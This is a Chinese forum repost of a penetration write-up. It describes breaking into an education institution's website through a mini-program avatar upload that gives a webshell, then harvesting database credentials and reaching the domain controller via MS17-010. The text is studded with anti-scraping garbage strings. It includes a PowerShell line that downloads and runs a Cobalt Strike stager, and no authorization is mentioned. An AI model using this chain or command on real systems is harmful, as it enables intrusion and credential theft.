找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2455|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

s2 t1 _- {" U. S2 ?4 P 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路2 t/ f7 X) `& B5 \$ g3 ` _1 _& M

* v# {3 _+ ^& @: r' D5 c

* J; R. l. m0 K0 p7 V% E  - q6 d% e4 D6 X* s1 |

; [) K, `. B. p# T$ A. |

6 @8 y! K! M$ ]- E& R1 t 正文, D7 b8 V; N; g: h7 u" N

; }$ ~% y5 s9 x- H8 k# x+ ?3 G0 ~

" \; M3 D! A& a! C: @( V  5 O4 W5 E0 Y9 i$ n5 w5 \

8 M* R# q8 J9 g$ x" p

- K+ E6 ~# ]' F7 @5 A5 g. J1 Z 目标:www.xxxx.com(一家教育机构)
. l% O( C4 Z* ^* I/ d
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
( Y3 p& D6 U, {' r+ e7 j+ Q

) [! @5 x1 u* m

, L' S" g6 U% Z" ` vshapes=0 ~/ {% ?$ C) u4 ^4 Y. x6 [

! Q1 u& w h$ |

H) e; q$ L5 u 进行了简单的信息搜集
, Q: s; k8 {! |. ^( I
% ]% j: o3 ?! E# m
: C1 K$ m3 r' }4 V0 d

+ Y. f* M. W8 V, G3 K& \( n

# H3 s! H8 V: N+ U% V/ V2 J/ i 子域名搜集) N$ N. ?2 A; }: D @5 }

, O& y& h# p$ I, V! \* i! w

' u0 G$ Z% M8 ]% c4 p X6 {4 } vshapes=/ U8 j( R7 b. ~ d3 f& A" h

. q' R+ R& ?$ q: J+ Q' u

* c! P2 ?; N6 J- }' E fofa找资产
; Y7 U A! A+ f/ ]( E
, s7 Z/ L7 Z- m) I4 W* R! [" X7 ^
% `- Y# h7 w) i4 v" p3 ~

7 g* E1 R# a( a2 i; M: h- P# `

4 c j8 h) H' W- W vshapes=: T7 k1 `) G5 B( w- G

1 l! c- @" L/ C, r4 A" d

# M$ g; ]( N# Q 一共七个资产。去重之后只有两个。
5 O& u9 S! R+ \; R: L
. I W7 B1 Z3 @ F+ S* A% Z
* L" f# g9 c, h! K! C# L

6 x9 W1 G2 J" t3 o* O/ u

/ b$ T( K1 \8 U' I, I/ L 目录探测( L5 d) P( f% {2 N% H

: [) b% z. h% @( Z! u" S/ K! L

# u' L# b: P& L# J( j vshapes=1 K2 U2 B. ~- ]- N4 W" x7 a

( x* ?6 ^% z$ g1 ? u' z3 K

' G4 }- M8 n& C3 p8 t1 V+ i 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& o2 a* d7 r% @- m7 n% U3 M3 ]
6 z; u* t$ y4 ]
. D+ f) |" Q; ]0 t- ]

# W) |* k0 y: E# d

+ Q5 S& t) G- c+ V* Y( C1 K! s' P 我又尝试了通过修改返回包来绕过登录界面 q: E+ E# K( i- K" J4 |, N

# b1 ~( _2 ?5 u% r0 r) R

5 O- D3 h# L! u- \2 i7 c vshapes=6 n7 ^9 ^) o0 n# Q$ ]* A2 G

0 B* z" P. G- t& ~& u* A

. J* E! ^9 L3 d3 D0 t- F: c 还是不行,尝试注入无果7 ~" W' c( x. `* H* Z; P

4 d2 v# {; p/ F, R! ]9 y

# U8 V+ u5 s- }7 w vshapes=2 ?: a2 o j2 f% D. `' X( Q

( X4 S- R; q8 M- j

% @( N* D3 F+ z# Y7 S. q 不过我目录探测出了一处Spring信息泄露
6 J1 I: c! L6 H9 C) U& o+ c
5 ^; F1 K5 C! T# V8 p
r. y9 V. A( P( R

4 S9 Q9 N2 r# C0 A: e

) b, K- K# \" p" q* T3 l vshapes=7 W1 Z/ s& p" @$ Z( E( t

9 O* u$ T W7 t

/ W% x6 E; `& {8 q( u' B5 z 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 6 a7 V e$ s4 a& g( s

; K% F5 ^7 T1 O g, x) }

# n2 j. f( g3 c9 q; Y4 e vshapes=9 f f8 a7 o7 S- F; {' b! T& I4 j7 F

9 q2 c! j4 ?. F- n! S: D

) ^0 l5 ^& N4 f$ V 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 , N! ] `3 ?: Y/ Y7 y

: F4 e1 R$ v) K

. Y2 y9 _- | {; @0 a: D3 `; D7 d4 Y' C vshapes=1 R2 S1 v) l. C `+ x4 `! Z& S

) {8 a* n, {) S$ S

6 \6 |) i3 ~& P4 ~/ `# V% z 获取有些师傅到这一步就手机抓包电脑测了。* x! i) n' h3 l- P

; t" R7 n6 U( g! y: i1 [. t- X& [' k

" z1 u- }3 p- M( { Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。8 U1 a6 z/ |" [0 G% [" {4 ^

) ]7 c: ~- t. J4 W

/ {! N0 Z3 i+ \/ X7 L" j 其中在一个公众号发现了小程序,可以进行注册。 # C! s" k0 a! @& Z

- G% H$ i) J1 r' b5 o& f% S

T/ y0 f' t. ?9 f 看到了头像上传,尝试上传获取WebShell 8 J" n1 j8 b' g4 H0 U9 R

. `8 P. b1 [$ @( j$ K5 a% _

& ~2 S- }5 V7 @; t( |) s' w: \ vshapes= 3 ~0 s9 @& [' m# Y' ^! t

: b' C5 d; k2 o4 f( g

' A! ~0 `7 o7 e5 X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 l% ~$ T) \' `1 \; n: R2 Y- i( H! f

- r" h W- ?, K( v1 L

" E( ^3 {) o0 V7 ~ vshapes=/ \7 V, n7 G7 G5 B K

: R* T; R. _7 P/ o1 B. q# L) |

# b% `( I& P% A& g3 s. r8 k* u 然后上了大马 0 z; o2 j; |$ U+ N' j8 r1 q

% b) a. I5 H3 {$ k& s

0 {$ `. _+ F Y2 E% ~* f; ^' {% C vshapes=# g% O3 M8 M5 ]; H6 G7 g

& L& O; K( F' R' }! P4 c6 A( f

# S# E+ s: D9 p* l- K0 v vshapes= ! C- H2 A) ?$ K9 O, T, n

, O/ [# B7 z+ @$ H

% E. t. F% F- W: G8 ]; F 通过翻找文件发现数据库账号密码9 ^, s! F* h, t* v

) P; o8 P2 d' v

# x" v# c8 B& M9 ]; X vshapes= ! D1 c. Z5 r4 Y

' Z6 n" f( F3 S4 A4 T( l

8 g4 H2 m/ z# t* n) I' ^/ O --内网渗透 . S3 F% O/ I7 Q7 ?3 M% P- X

* y c# w( q6 g: H9 O0 d: S& f

7 L- x) h4 c1 @ 直接通过powershell执行 cs上线 ; y" U7 W$ Q3 `" ? F

( Z' H: O8 E9 H) z

! K' L! o9 D0 J0 W8 }+ z8 B2 P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"7 K3 b, p) o$ _

. q8 p$ c# L9 q/ w

/ ` P# I2 d" K& C vshapes=" @: ?: S7 ?/ E0 U) w1 F5 Z' v

$ J" g% Z7 C8 t8 L( d j

) I7 Y/ C8 n- P4 @/ c% L. Y5 C 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 , f+ Q9 e" q! B8 D3 u( t

$ @( @ M, i- {

( h- ]& {; q& K; j( t, M$ n vshapes= 4 M2 A) `& l4 c" G

/ L& j7 U2 a1 v4 `. e% t

8 K1 I9 {: R6 _9 w# [6 G 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% n; ?$ {6 U1 ?1 g7 f% _0 z
# y* Y7 Z4 l; ?7 n0 G' i- x& Q
7 c3 C4 f& d9 l$ ]5 u3 t9 w
q! X* i9 ` Q% E

~2 S0 j- `/ S. O- {( }; r

4 C2 M2 k: i- \ vshapes= 2 ?( C0 n; z- W, l

6 n5 C) S( n. R! I& Y

2 d! h9 r s8 G4 X2 \ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" i$ ?3 F$ F; o) z
& d- A3 @% i1 K% O
?2 s( }! u0 l% B5 ~, M! f

" h) G- C# t$ h9 \& ~

. c" s5 V+ u( J( ?8 l vshapes= 7 @, k h/ }# S

1 Z$ @% {6 q: t. P

k# Z2 D" R& u' V
+ \: E9 t! r' v v/ O, X% f5 z9 s
. n0 H' U7 |, M4 x& w3 |
, h3 ?9 C* G7 J( a! X1 E# r4 V L5 Y

3 e) x% i! [1 O3 \- X- x# @. N X) b

% m: a$ A: ^0 r* U0 X" x' b3 S   2 d+ l4 _3 r) V

9 J& E, }3 l6 m8 Q" h

; S- T, s9 a* F 小结0 p' ^0 B& {, M x2 M ^! C

, v: P5 T( ^- l* {" I$ o0 j

+ S# }( J3 Z! J3 q0 h6 v, q   # ?- }# B' f6 N, v

& T# o# I/ r* u2 c& @% r i8 \

3 [! U2 g0 l) T: r% Q' I: D 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!/ [8 `& C5 q# B' F

; \4 Z1 D: x$ A; t5 I3 U

9 y/ |5 [5 u1 u7 R) c/ s  ' f, k* e2 p0 L# n. h) w

# R5 l6 G; D5 h, \# s
    % A3 Q9 N# ^4 v0 w1 U
  • ) g6 Z' a; Z8 E/ D" Y/ J   p, O3 A g3 r" Q
  • 2 ?5 V- ^5 g3 l
  • . A# }3 i( I% v- c r   ) F# O, h" l% w- G6 \
  • 5 U# g3 x2 q$ @2 M% h, V4 u' T
/ a I0 G6 Q0 x2 U' v# [, y. l

6 h9 K" b: v) \! \7 y$ e1 b 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html5 O) J* B( E; n' `) t

% s w* b! q4 X

# p' l r( v/ b; W, S   7 i5 \+ a& E/ Q0 W3 H' ]( H1 b

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表